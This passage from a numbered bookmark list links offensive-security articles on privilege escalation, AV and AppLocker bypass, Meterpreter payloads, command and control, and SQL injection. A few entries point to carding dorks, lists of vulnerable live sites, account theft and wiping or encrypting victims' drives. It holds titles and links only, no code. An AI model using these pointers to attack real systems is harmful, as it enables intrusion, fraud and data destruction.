Shellter:\n\n\nhttps://www.hackingloops.com/evading-anti-virus-shellter/\n\n\n-389-Mobile Hacking Part 4: Fetching Payloads via USB Rubber Ducky:\n\n\nhttps://www.hackingloops.com/payloads-via-usb-rubber-ducky/\n\n\n-390-Ethical Hacking Practice Test 6 – Footprinting Fundamentals Level1:\n\n\nhttps://www.hackingloops.com/ethical-hacking-practice-test-6-footprinting-fundamentals-level1/\n\n\n-391-Skip Cracking Responder Hashes and Relay 
Them:\n\n\nhttps://threat.tevora.com/quick-tip-skip-cracking-responder-hashes-and-replay-them/\n\n\n-392-Cracking NTLMv1 Handshakes with Crack.sh:\n\n\nhttp://threat.tevora.com/quick-tip-crack-ntlmv1-handshakes-with-crack-sh/\n\n\n-393-Top 3 Anti-Forensic OpSec Tips for Linux & A New Dead Man’s Switch:\n\n\nhttps://medium.com/p/d5e92843e64a\n\n\n-394-VNC Penetration Testing (Port 5901):\n\n\nhttp://www.hackingarticles.in/vnc-penetration-testing\n\n\n-395-Windows Privilege Escalation:\n\n\nhttp://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation\n\n\n-396-Removing Sender’s IP Address From Email’s Received: From Header:\n\n\nhttps://www.devside.net/wamp-server/removing-senders-ip-address-from-emails-received-from-header\n\n\n-397-Dump Cleartext Password in Linux PC using MimiPenguin:\n\n\nhttp://www.hackingarticles.in/dump-cleartext-password-linux-pc-using-mimipenguin\n\n\n-398-Embedded Backdoor with Image using FakeImageExploiter:\n\n\nhttp://www.hackingarticles.in/embedded-backdoor-image-using-fakeimageexploiter\n\n\n-399-Exploit Command Injection Vulnearbility with Commix and Netcat:\n\n\nhttp://www.hackingarticles.in/exploit-command-injection-vulnearbility-commix-netcat\n\n\n-400-Exploiting Form Based Sql Injection using Sqlmap:\n\n\nhttp://www.hackingarticles.in/exploiting-form-based-sql-injection-using-sqlmap\n\n\n-401-Beginner Guide to impacket Tool kit:\n\n\nhttp://www.hackingarticles.in/beginner-guide-to-impacket-tool-kit\n\n\n-402-Best of Post Exploitation Exploits & Tricks:\n\n\nhttp://www.hackingarticles.in/best-of-post-exploitation-exploits-tricks\n\n\n-403-Command Injection to Meterpreter using Commix:\n\n\nhttp://www.hackingarticles.in/command-injection-meterpreter-using-commix\n\n\n-404-Comprehensive Guide to Crunch Tool:\n\n\nhttp://www.hackingarticles.in/comprehensive-guide-to-crunch-tool\n\n\n-405-Compressive Guide to File Transfer (Post 
Exploitation):\n\n\nhttp://www.hackingarticles.in/compressive-guide-to-file-transfer-post-exploitation\n\n\n-406-Crack Wifi Password using Aircrack-Ng (Beginner’s Guide):\n\n\nhttp://www.hackingarticles.in/crack-wifi-password-using-aircrack-ng\n\n\n-407-How to Detect Meterpreter in Your PC:\n\n\nhttp://www.hackingarticles.in/detect-meterpreter-pc\n\n\n-408-Easy way to Hack Database using Wizard switch in Sqlmap:\n\n\nhttp://www.hackingarticles.in/easy-way-hack-database-using-wizard-switch-sqlmap\n\n\n-409-Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn):\n\n\nhttp://www.hackingarticles.in/exploiting-webserver-using-sqlmap-metasploit-os-pwn\n\n\n-410-Create SSL Certified Meterpreter Payload using MPM:\n\n\nhttp://www.hackingarticles.in/exploit-remote-pc-ssl-certified-meterpreter-payload-using-mpm\n\n\n-411-Port forwarding: A practical hands-on guide:\n\n\nhttps://www.abatchy.com/2017/01/port-forwarding-practical-hands-on-guide\n\n\n-412-Exploit Dev 101: Jumping to Shellcode:\n\nhttps://www.abatchy.com/2017/05/jumping-to-shellcode.html\n\n\n-413-Introduction to Manual Backdooring:\n\n\nhttps://www.abatchy.com/2017/05/introduction-to-manual-backdooring_24.html\n\n\n-414-Kernel Exploitation:\n\n\nhttps://www.abatchy.com/2018/01/kernel-exploitation-1\n\n\n-415-Exploit Dev 101: Bypassing ASLR on Windows:\n\n\nhttps://www.abatchy.com/2017/06/exploit-dev-101-bypassing-aslr-on.html\n\n\n-416-Shellcode reduction tips (x86):\n\n\nhttps://www.abatchy.com/2017/04/shellcode-reduction-tips-x86\n\n\n-417-OSCE Study Plan:\n\n\nhttps://www.abatchy.com/2017/03/osce-study-plan\n\n\n-418-[DefCamp CTF Qualification 2017] Don't net, kids! 
(Revexp 400):\n\n\nhttps://www.abatchy.com/2017/10/defcamp-dotnot\n\n\n-419-DRUPAL 7.X SERVICES MODULE UNSERIALIZE() TO RCE:\n\n\n\nhttps://www.ambionics.io/\n\n\n\n-420-SQL VULNERABLE WEBSITES LIST 2017 [APPROX 2500 FRESH SQL VULNERABLE SITES]:\n\n\n\nhttps://www.cityofhackerz.com/sql-vulnerable-websites-list-2017\n\n\n-421-Windows IR Live Forensics Cheat Sheet:\n\n\nhttps://www.cheatography.com/tag/forensics/\n\n\n-422-windows-kernel-logic-bug-class-access:\n\n\nhttps://googleprojectzero.blogspot.com/2019/03/windows-kernel-logic-bug-class-access.html\n\n\n\n-423-injecting-code-into-windows-protected:\n\n\nhttps://googleprojectzero.blogspot.com/2018/11/injecting-code-into-windows-protected.html\n\n\n-424-USING THE DDE ATTACK WITH POWERSHELL EMPIRE:\n\n\nhttps://1337red.wordpress.com/using-the-dde-attack-with-powershell-empire\n\n\n-425-Automated Derivative Administrator Search:\n\n\nhttps://wald0.com/?p=14\n\n\n-426-A Red Teamer’s Guide to GPOs and OUs:\n\n\nhttps://wald0.com/?p=179\n\n\n-427-Pen Testing and Active Directory, Part VI: The Final Case:\n\n\nhttps://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/\n\n\n-428-Offensive Tools and Techniques:\n\n\nhttps://www.sec.uno/2017/03/01/offensive-tools-and-techniques/\n\n\n-429-Three penetration testing tips to out-hack hackers:\n\n\nhttp://infosechotspot.com/three-penetration-testing-tips-to-out-hack-hackers-betanews/\n\n\n-430-Introducing BloodHound:\n\n\nhttps://wald0.com/?p=68\n\n\n-431-Red + Blue = Purple:\n\n\nhttp://www.blackhillsinfosec.com/?p=5368\n\n\n-432-Active Directory Access Control List – Attacks and Defense – Enterprise Mobility and Security Blog:\n\n\nhttps://blogs.technet.microsoft.com/enterprisemobility/2017/09/18/active-directory-access-control-list-attacks-and-defense/\n\n\n-433-PrivEsc: Unquoted Service Path:\n\n\nhttps://www.gracefulsecurity.com/privesc-unquoted-service-path/\n\n\n-434-PrivEsc: Insecure Service 
Permissions:\n\n\nhttps://www.gracefulsecurity.com/privesc-insecure-service-permissions/\n\n\n-435-PrivEsc: DLL Hijacking:\n\n\nhttps://www.gracefulsecurity.com/privesc-dll-hijacking/\n\n\n-436-Android Reverse Engineering 101 – Part 1:\n\n\nhttp://www.fasteque.com/android-reverse-engineering-101-part-1/\n\n\n-437-Luckystrike: An Evil Office Document Generator:\n\n\nhttps://www.shellntel.com/blog/2016/9/13/luckystrike-a-database-backed-evil-macro-generator\n\n\n-438-the-number-one-pentesting-tool-youre-not-using:\n\n\nhttps://www.shellntel.com/blog/2016/8/3/the-number-one-pentesting-tool-youre-not-using\n\n\n-439-uac-bypass:\n\n\nhttp://www.securitynewspaper.com/tag/uac-bypass/\n\n\n-440-XSSer – Automated Framework Tool to Detect and Exploit XSS vulnerabilities:\n\n\nhttps://gbhackers.com/xsser-automated-framework-detectexploit-report-xss-vulnerabilities\n\n\n-441-Penetration Testing on X11 Server:\n\n\nhttp://www.hackingarticles.in/penetration-testing-on-x11-server\n\n\n-442-Always Install Elevated:\n\n\nhttps://pentestlab.blog/2017/02/28/always-install-elevated\n\n\n-443-Scanning for Active Directory Privileges & Privileged Accounts:\n\nhttps://adsecurity.org/?p=3658\n\n\n-444-Windows Server 2016 Active Directory Features:\n\n\nhttps://adsecurity.org/?p=3646\n\n\n-445-powershell:\n\n\nhttps://adsecurity.org/?tag=powershell\n\n\n-446-PowerShell Security: PowerShell Attack Tools, Mitigation, & Detection:\n\n\nhttps://adsecurity.org/?p=2921\n\n\n-447-DerbyCon 6 (2016) Talk – Attacking EvilCorp: Anatomy of a Corporate Hack:\n\n\nhttps://adsecurity.org/?p=3214\n\n\n-448-Real-World Example of How Active Directory Can Be Compromised (RSA Conference Presentation):\n\n\nhttps://adsecurity.org/?p=2085\n\n\n-449-Advanced ATM Penetration Testing Methods:\n\n\nhttps://gbhackers.com/advanced-atm-penetration-testing-methods\n\n\n-450-Background: Microsoft Ofice 
Exploitation:\n\n\nhttps://rhinosecuritylabs.com/research/abusing-microsoft-word-features-phishing-subdoc/\n\n\n-451-Automated XSS Finder:\n\n\nhttps://medium.com/p/4236ed1c6457\n\n\n-452-Application whitelist bypass using XLL and embedded shellcode:\n\n\nhttps://rileykidd.com/.../application-whitelist-bypass-using-XLL-and-embedded-shellc\n\n\n-453-AppLocker Bypass – Regsvr32:\n\n\nhttps://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32\n\n\n\n-454-Nmap Scans using Hex Value of Flags:\n\n\nhttp://www.hackingarticles.in/nmap-scans-using-hex-value-flags\n\n\n-455-Nmap Scan with Timing Parameters:\n\n\nhttp://www.hackingarticles.in/nmap-scan-with-timing-parameters\n\n\n-456-OpenSSH User Enumeration Time- Based Attack with Osueta:\n\n\nhttp://www.hackingarticles.in/openssh-user-enumeration-time-based-attack-osueta\n\n\n-457-Penetration Testing:\n\n\nhttp://www.hackingarticles.in/web-penetration-testing/\n\n\n-458-Penetration Testing on Remote Desktop (Port 3389):\n\n\nhttp://www.hackingarticles.in/penetration-testing-remote-desktop-port-3389\n\n\n-459-Penetration Testing on Telnet (Port 23):\n\n\nhttp://www.hackingarticles.in/penetration-testing-telnet-port-23\n\n\n-460-Penetration Testing in Windows/Active Directory with Crackmapexec:\n\n\nhttp://www.hackingarticles.in/penetration-testing-windowsactive-directory-crackmapexec\n\n\n-461-Penetration Testing in WordPress Website using WordPress Exploit Framework:\n\n\nhttp://www.hackingarticles.in/penetration-testing-wordpress-website-using-wordpress-exploit-framework\n\n\n-462-Port Scanning using Metasploit with IPTables:\n\n\nhttp://www.hackingarticles.in/port-scanning-using-metasploit-iptables\n\n\n-463-Post Exploitation Using WMIC (System Command):\n\n\nhttp://www.hackingarticles.in/post-exploitation-using-wmic-system-command\n\n\n-464-Privilege Escalation in Linux using etc/passwd file:\n\n\n\nhttp://www.hackingarticles.in/privilege-escalation-in-linux-using-etc-passwd-file\n\n\n-465-RDP Pivoting with 
Metasploit:\n\n\nhttp://www.hackingarticles.in/rdp-pivoting-metasploit\n\n\n-466-A New Way to Hack Remote PC using Xerosploit and Metasploit:\n\n\nhttp://www.hackingarticles.in/new-way-hack-remote-pc-using-xerosploit-metasploit\n\n\n-467-Shell to Meterpreter using Session Command:\n\n\nhttp://www.hackingarticles.in/shell-meterpreter-using-session-command\n\n\n-468-SMTP Pentest Lab Setup in Ubuntu (Port 25):\n\n\nhttp://www.hackingarticles.in/smtp-pentest-lab-setup-ubuntu\n\n\n-469-SNMP Lab Setup and Penetration Testing:\n\n\nhttp://www.hackingarticles.in/snmp-lab-setup-and-penetration-testing\n\n\n-470-SQL Injection Exploitation in Multiple Targets using Sqlmap:\n\n\nhttp://www.hackingarticles.in/sql-injection-exploitation-multiple-targets-using-sqlmap\n\n\n-471-Sql Injection Exploitation with Sqlmap and Burp Suite (Burp CO2 Plugin):\n\n\nhttp://www.hackingarticles.in/sql-injection-exploitation-sqlmap-burp-suite-burp-co2-plugin\n\n\n-472-SSH Penetration Testing (Port 22):\n\n\nhttp://www.hackingarticles.in/ssh-penetration-testing-port-22\n\n\n-473-Manual Post Exploitation on Windows PC (System Command):\n\n\nhttp://www.hackingarticles.in/manual-post-exploitation-windows-pc-system-command\n\n\n-474-SSH Pivoting using Meterpreter:\n\n\nhttp://www.hackingarticles.in/ssh-pivoting-using-meterpreter\n\n\n-475-Stealing Windows Credentials of Remote PC with MS Office Document:\n\n\nhttp://www.hackingarticles.in/stealing-windows-credentials-remote-pc-ms-office-document\n\n\n-476-Telnet Pivoting through Meterpreter:\n\n\nhttp://www.hackingarticles.in/telnet-pivoting-meterpreter\n\n\n-477-Hack Password using Rogue Wi-Fi Access Point Attack (WiFi-Pumpkin):\n\n\nhttp://www.hackingarticles.in/hack-password-using-rogue-wi-fi-access-point-attack-wifi-pumpkin\n\n\n-478-Hack Remote PC using Fake Updates Scam with Ettercap and Metasploit:\n\n\nhttp://www.hackingarticles.in/hack-remote-pc-using-fake-updates-scam-with-ettercap-and-metasploit\n\n\n-479-Hack Remote Windows 10 Password in 
Plain Text using Wdigest Credential Caching Exploit:\n\n\nhttp://www.hackingarticles.in/hack-remote-windows-10-password-plain-text-using-wdigest-credential-caching-exploit\n\n\n-480-Hack Remote Windows 10 PC using TheFatRat:\n\n\nhttp://www.hackingarticles.in/hack-remote-windows-10-pc-using-thefatrat\n\n\n-481-2 Ways to Hack Windows 10 Password Easy Way:\n\n\nhttp://www.hackingarticles.in/hack-windows-10-password-easy-way\n\n\n-482-How to Change ALL Files Extension in Remote PC (Confuse File Extensions Attack):\n\n\nhttp://www.hackingarticles.in/how-to-change-all-files-extension-in-remote-pc-confuse-file-extensions-attack\n\n\n-483-How to Delete ALL Files in Remote Windows PC:\n\n\nhttp://www.hackingarticles.in/how-to-delete-all-files-in-remote-windows-pc-2\n\n\n-484-How to Encrypt Drive of Remote Victim PC:\n\n\nhttp://www.hackingarticles.in/how-to-encrypt-drive-of-remote-victim-pc\n\n\n-485-Post Exploitation in Linux With Metasploit:\n\n\nhttps://pentestlab.blog/2013/01/04/post-exploitation-in-linux-with-metasploit\n\n\n-486-Red Team:\n\n\nhttps://posts.specterops.io/tagged/red-team?source=post\n\n\n-487-Code Signing Certi cate Cloning Attacks and Defenses:\n\n\nhttps://posts.specterops.io/tagged/code-signing?source=post\n\n\n-488-Phishing:\n\n\nhttps://posts.specterops.io/tagged/phishing?source=post\n\n\n-489-PowerPick – A ClickOnce Adjunct:\n\n\nhttp://www.sixdub.net/?p=555\n\n\n-490-sql-injection-xss-playground:\n\n\nhttps://ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground\n\n\n-491-Privilege Escalation & 
Post-Exploitation:\n\n\nhttps://github.com/rmusser01/Infosec_Reference/raw/master/Draft/Privilege%20Escalation%20%26%20Post-Exploitation.md\n\n\n-492-https-payload-and-c2-redirectors:\n\n\nhttps://posts.specterops.io/https-payload-and-c2-redirectors-ff8eb6f87742?source=placement_card_footer_grid---------2-41\n\n\n-493-a-push-toward-transparency:\n\n\nhttps://posts.specterops.io/a-push-toward-transparency-c385a0dd1e34?source=placement_card_footer_grid---------0-41\n\n\n-494-bloodhound:\n\n\nhttps://posts.specterops.io/tagged/bloodhound?source=post\n\n\n-495-active directory:\n\n\nhttps://posts.specterops.io/tagged/active-directory?source=post\n\n\n-496-Load & Execute Bundles with migrationTool:\n\n\nhttps://posts.specterops.io/load-execute-bundles-with-migrationtool-f952e276e1a6?source=placement_card_footer_grid---------1-41\n\n\n-497-Outlook Forms and Shells:\n\n\nhttps://sensepost.com/blog/2017/outlook-forms-and-shells/\n\n\n-498-Tools:\n\n\nhttps://sensepost.com/blog/tools/\n\n\n-499-2018 pentesting resources:\n\n\nhttps://sensepost.com/blog/2018/\n\n\n-500-network pentest:\n\n\nhttps://securityonline.info/category/penetration-testing/network-pentest/\n\n\n-501-[technical] Pen-testing resources:\n\n\nhttps://medium.com/p/cd01de9036ad\n\n\n\n-502-Stored XSS on Facebook:\n\n\nhttps://opnsec.com/2018/03/stored-xss-on-facebook/\n\n\n-503-vulnerabilities:\n\n\nhttps://www.brokenbrowser.com/category/vulnerabilities/\n\n\n-504-Extending BloodHound: Track and Visualize Your Compromise:\n\n\nhttps://porterhau5.com/.../extending-bloodhound-track-and-visualize-your-compromise\n\n\n-505-so-you-want-to-be-a-web-security-researcher:\n\n\nhttps://portswigger.net/blog/so-you-want-to-be-a-web-security-researcher\n\n\n-506-BugBounty — AWS S3 added to my “Bucket” list!:\n\n\nhttps://medium.com/p/f68dd7d0d1ce\n\n\n-507-BugBounty — API keys leakage, Source code disclosure in India’s largest e-commerce health care company:\n\n\nhttps://medium.com/p/c75967392c7e\n\n\n-508-BugBounty — 
Exploiting CRLF Injection can lands into a nice bounty:\n\n\nhttps://medium.com/p/159525a9cb62\n\n\n-509-BugBounty — How I was able to bypass rewall to get RCE and then went from server shell to get root user account:\n\n\nhttps://medium.com/p/783f71131b94\n\n\n-510-BugBounty — “I don’t need your current password to login into youraccount” - How could I completely takeover any user’s account in an online classi ed ads company:\n\n\nhttps://medium.com/p/e51a945b083d\n\n\n-511-Ping Power — ICMP Tunnel:\n\n\nhttps://medium.com/bugbountywriteup/ping-power-icmp-tunnel-31e2abb2aaea?source=placement_card_footer_grid---------1-41\n\n\n-512-hacking:\n\n\nhttps://www.nextleveltricks.com/hacking/\n\n\n-513-Top 8 Best YouTube Channels To Learn Ethical Hacking Online !:\n\n\nhttps://www.nextleveltricks.com/youtube-channels-to-learn-hacking/\n\n\n-514-Google Dorks List 2018 | Fresh Google Dorks 2018 for SQLi:\n\n\nhttps://www.nextleveltricks.com/latest-google-dorks-list/\n\n\n-515-Art of Shellcoding: Basic AES Shellcode Crypter:\n\n\nhttp://www.nipunjaswal.com/2018/02/shellcode-crypter.html\n\n\n-516-Big List Of Google Dorks Hacking:\n\n\nhttps://xspiyr.wordpress.com/2012/09/05/big-list-of-google-dorks-hacking/\n\n\n-517-nmap-cheatsheet:\n\n\nhttps://bitrot.sh/cheatsheet/09-12-2017-nmap-cheatsheet/\n\n\n-518-Aws Recon:\n\n\nhttps://enciphers.com/tag/aws-recon/\n\n\n-519-Recon:\n\nhttps://enciphers.com/tag/recon/\n\n\n-520-Subdomain Enumeration:\n\n\nhttps://enciphers.com/tag/subdomain-enumeration/\n\n\n-521-Shodan:\n\n\nhttps://enciphers.com/tag/shodan/\n\n\n-522-Dump LAPS passwords with ldapsearch:\n\n\nhttps://malicious.link/post/2017/dump-laps-passwords-with-ldapsearch/\n\n\n-523-peepdf - PDF Analysis Tool:\n\n\nhttp://eternal-todo.com/tools/peepdf-pdf-analysis-tool\n\n\n-524-Evilginx 2 - Next Generation of Phishing 2FA Tokens:\n\n\nbreakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokens/\n\n\n-526-Evil XML with two 
encodings:\n\n\nhttps://mohemiv.com/all/evil-xml/\n\n\n-527-create-word-macros-with-powershell:\n\n\nhttps://4sysops.com/archives/create-word-macros-with-powershell/\n\n\n-528-Excess XSS A comprehensive tutorial on cross-site scripting:\n\n\nhttps://excess-xss.com/\n\n\n\n-529-Executing Commands and Bypassing AppLocker with PowerShell Diagnostic Scripts:\n\n\nhttps://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/\n\n\n-530-Abusing DCOM For Yet Another Lateral Movement Technique:\n\n\nhttps://bohops.com/2018/04/28/abusing-dcom-for-yet-another-lateral-movement-technique/\n\n\n-531-Trust Direction: An Enabler for Active Directory Enumeration and Trust Exploitation:\n\n\n\nhttps://bohops.com/2017/12/02/trust-direction-an-enabler-for-active-directory-enumeration-and-trust-exploitation/\n\n\n\n-532-Abusing DCOM For Yet Another Lateral Movement Technique:\n\n\nhttps://bohops.com/2018/04/28/abusing-dcom-for-yet-another-lateral-movement-technique/\n\n\n-533-“Practical recon techniques for bug hunters & pen testers”:\n\n\nhttps://blog.appsecco.com/practical-recon-techniques-for-bug-hunters-pen-testers-at-levelup-0x02-b72c15641972?source=placement_card_footer_grid---------2-41\n\n\n-534-Exploiting Node.js deserialization bug for Remote Code Execution:\n\n\nhttps://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/\n\n\n-535-Exploiting System Shield AntiVirus Arbitrary Write Vulnerability using SeTakeOwnershipPrivilege:\n\n\nhttp://www.greyhathacker.net/?p=1006\n\n\n-536-Running Macros via ActiveX Controls:\n\n\nhttp://www.greyhathacker.net/?p=948\n\n\n-537-all=BUG+MALWARE+EXPLOITS\n\n\nhttp://www.greyhathacker.net/?cat=18\n\n\n-538-“FILELESS” UAC BYPASS USING EVENTVWR.EXE AND:\n\n\nhttps://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking\n\n\n-539-BYPASSING UAC ON WINDOWS 10 USING DISK 
CLEANUP:\n\n\nhttps://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/\n\n\n-540-A Look at CVE-2017-8715: Bypassing CVE-2017-0218 using PowerShell Module Manifests:\n\n\nhttps://enigma0x3.net/2017/11/06/a-look-at-cve-2017-8715-bypassing-cve-2017-0218-using-powershell-module-manifests/\n\n\n-541-“FILELESS” UAC BYPASS USING SDCLT.EXE:\n\n\nhttps://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe\n\n\n-542-File Upload XSS:\n\n\nhttps://medium.com/p/83ea55bb9a55\n\n\n-543-Firebase Databases:\n\n\nhttps://medium.com/p/f651a7d49045\n\n\n-544-Safe Red Team Infrastructure:\n\n\nhttps://medium.com/@malcomvetter/safe-red-team-infrastructure-c5d6a0f13fac\n\n\n-545-RED-TEAM:\n\n\nhttps://cybersyndicates.com/tags/red-team/\n\n\n-546-Egressing Bluecoat with Cobaltstike & Let's Encrypt:\n\n\nhttps://www.youtube.com/watch?v=cgwfjCmKQwM\n\n\n-547-Veil-Evasion:\n\n\nhttps://cybersyndicates.com/tags/veil-evasion/\n\n\n-548-Dangerous Virus For Windows Crashes Everything Hack window Using Virus:\n\n\nhttp://thelearninghacking.com/create-virus-hack-windows/\n\n\n-549-Download Google Dorks List 2019:\n\n\nhttps://medium.com/p/323c8067502c\n\n\n-550-Don’t leak sensitive data via security scanning tools:\n\n\nhttps://medium.com/p/7d1f715f0486\n\n\n-551-CRLF Injection Into PHP’s cURL Options:\n\n\nhttps://medium.com/@tomnomnom/crlf-injection-into-phps-curl-options-e2e0d7cfe545?source=placement_card_footer_grid---------0-60\n\n\n-552-Open Redirects & Security Done Right!:\n\n\nhttps://medium.com/@AkshaySharmaUS/open-redirects-security-done-right-e524a3185496?source=placement_card_footer_grid---------2-60\n\n\n-553-DOM XSS – auth.uber.com:\n\n\nhttps://stamone-bug-bounty.blogspot.com/2017/10/dom-xss-auth_14.html\n\n\n-554-PowerPoint and Custom Actions:\n\n\nhttps://cofense.com/powerpoint-and-custom-actions/\n\n\n-555-exploiting-adobe-coldfusion:\n\n\nhttps://codewhitesec.blogspot.com/2018/03/exploiting-adobe-coldfusion.html\n\n\n\n-556-Command and Control – 
HTTPS:\n\n\nhttps://pentestlab.blog/2017/10/04/command-and-control-https\n\n\n-557-Command and Control – Images:\n\n\nhttps://pentestlab.blog/2018/01/02/command-and-control-images\n\n\n-558-Command and Control – JavaScript:\n\n\nhttps://pentestlab.blog/2018/01/08/command-and-control-javascript\n\n\n-559-XSS-Payloads:\n\n\n\nhttps://github.com/Pgaijin66/XSS-Payloads\n\n\n-560-Command and Control – Web Interface:\n\n\nhttps://pentestlab.blog/2018/01/03/command-and-control-web-interface\n\n\n-561-Command and Control – Website:\n\n\nhttps://pentestlab.blog/2017/11/14/command-and-control-website\n\n\n-562-Command and Control – WebSocket:\n\n\nhttps://pentestlab.blog/2017/12/06/command-and-control-websocket\n\n\n-563-atomic-red-team:\n\n\nhttps://github.com/redcanaryco/atomic-red-team\n\n\n\n-564-PowerView-3.0-tricks.ps1:\n\n\nhttps://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993\n\n\n-565-awesome-sec-talks:\n\n\nhttps://github.com/PaulSec/awesome-sec-talks\n\n\n-566-Awesome-Red-Teaming:\n\n\nhttps://github.com/yeyintminthuhtut/Awesome-Red-Teaming\n\n\n-567-awesome-php:\n\n\nhttps://github.com/ziadoz/awesome-php\n\n\n-568-latest-hacks:\n\n\nhttps://hackercool.com/latest-hacks/\n\n\n-569-GraphQL NoSQL Injection Through JSON Types:\n\n\nhttp://www.east5th.co/blog/2017/06/12/graphql-nosql-injection-through-json-types/\n\n\n-570-Writing .NET Executables for Pentesters:\n\n\nhttps://www.peew.pw/blog/2017/12/4/writing-net-executables-for-penteters-part-2\n\n\n-571-A curated list of fuzzing resources ( Books, courses - free and paid, videos, tools, tutorials and vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Development like root cause analysis.\n\n\nhttps://github.com/secfigo/Awesome-Fuzzing\n\n\n-572-How to Shutdown, Restart, Logoff, and Hibernate Remote Windows PC:\n\n\nhttp://www.hackingarticles.in/how-to-shutdown-restart-logoff-and-hibernate-remote-windows-pc\n\n\n-572-Injecting Metasploit Payloads into Android 
Applications – Manually:\n\n\nhttps://pentestlab.blog/2017/06/26/injecting-metasploit-payloads-into-android-applications-manually\n\n\n\n-573-Google Dorks For Carding [Huge List] - Part 1:\n\n\nhttps://hacker-arena.blogspot.com/2014/03/google-dorks-for-carding-huge-list-part.html\n\n\n-574-Google dorks for growth hackers:\n\n\nhttps://medium.com/p/7f83c8107057\n\n\n-575-Google Dorks For Carding (HUGE LIST):\n\n\nhttps://leetpedia.blogspot.com/2013/01/google-dorks-for-carding-huge-list.html\n\n\n-576-BIGGEST SQL Injection Dorks List ~ 20K+ Dorks:\n\n\nhttps://leetpedia.blogspot.com/2013/05/biggest-sql-injection-dorks-list-20k.html\n\n\n-577-Pastebin Accounts Hacking (Facebook/Paypal/LR/Gmail/Yahoo, etc):\n\n\nhttps://leetpedia.blogspot.com/2013/01/pastebin-accounts-hacking.html\n\n\n-578-How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!:\n\n\nhttp://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html\n\n\n-579-Hijacking VNC (Enum, Brute, Access and Crack):\n\n\nhttps://medium.com/p/d3d18a4601cc\n\n\n-580-Linux Post Exploitation Command List:\n\n\nhttps://github.com/mubix/post-exploitation/wiki\n\n\n-581-List of google dorks for sql injection:\n\n\nhttps://deadlyhacker.wordpress.com/2013/05/09/list-of-google-dorks-for-sql-injection/\n\n\n-582-Microsoft Office – NTLM Hashes via Frameset:\n\n\nhttps://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset\n\n\n\n-583-Microsoft Windows 10 - Child Process Restriction Mitigation Bypass:\n\n\nhttps://www.exploit-db.com/download/44888.txt\n\n\n-584-Microsoft Windows CVE-2018-8210 Remote Code Execution Vulnerability:\n\n\nhttps://www.securityfocus.com/bid/104407\n\n\n-585-Microsoft Windows Kernel CVE-2018-0982 Local Privilege Escalation Vulnerability:\n\n\nhttps://www.securityfocus.com/bid/104382\n\n\n-586-miSafes Mi-Cam Device Hijacking:\n\n\nhttps://packetstormsecurity.com/files/146504/SA-20180221-0.txt\n\n\n-587-Low-Level Windows API Access From 
PowerShell:\n\n\n\nhttps://www.fuzzysecurity.com/tutorials/24.html\n\n\n-588-Linux Kernel 'mm/hugetlb.c' Local Denial of Service Vulnerability:\n\n\nhttps://www.securityfocus.com/bid/103316\n\n\n-589-Lateral Movement – RDP:\n\n\nhttps://pentestlab.blog/2018/04/24/lateral-movement-rdp/\n\n\n-590-Snagging creds from locked machines:\n\n\nhttps://malicious.link/post/2016/snagging-creds-from-locked-machines/\n\n\n-591-Making a Blind SQL Injection a Little Less Blind:\n\n\nhttps://medium.com/p/428dcb614ba8\n\n\n-592-VulnHub — Kioptrix: Level 5:\n\n\nhttps://medium.com/@bondo.mike/vulnhub-kioptrix-level-5-88ab65146d48?source=placement_card_footer_grid---------1-60\n\n\n-593-Unauthenticated Account Takeover Through HTTP Leak:\n\n\nhttps://medium.com/p/33386bb0ba0b\n\n\n-594-Hakluke’s Ultimate OSCP Guide: Part 1 — Is OSCP for you?:\n\n\nhttps://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-1-is-oscp-for-you-b57cbcce7440?source=placement_card_footer_grid---------2-43\n\n\n-595-Finding Target-relevant Domain Fronts:\n\n\nhttps://medium.com/@vysec.private/finding-target-relevant-domain-fronts-7f4ad216c223?source=placement_card_footer_grid---------0-44\n\n\n-596-Safe Red Team Infrastructure:\n\n\nhttps://medium.com/@malcomvetter/safe-red-team-infrastructure-c5d6a0f13fac?source=placement_card_footer_grid---------1-60\n\n\n-597-Cobalt Strike Visualizations:\n\n\nhttps://medium.com/@001SPARTaN/cobalt-strike-visualizations-e6a6e841e16b?source=placement_card_footer_grid---------2-60\n\n\n\n-598-OWASP Top 10 2017 — Web Application Security Risks:\n\n\nhttps://medium.com/p/31f356491712\n\n\n-599-XSS-Auditor — the protector of unprotected:\n\n\nhttps://medium.com/bugbountywriteup/xss-auditor-the-protector-of-unprotected-f900a5e15b7b?source=placement_card_footer_grid---------0-60\n\n\n-600-Netcat vs Cryptcat – Remote Shell to Control Kali Linux from Windows machine:\n\n\nhttps://gbhackers.com/netcat-vs-cryptcat\n\n\n-601-Jenkins Servers Infected With 
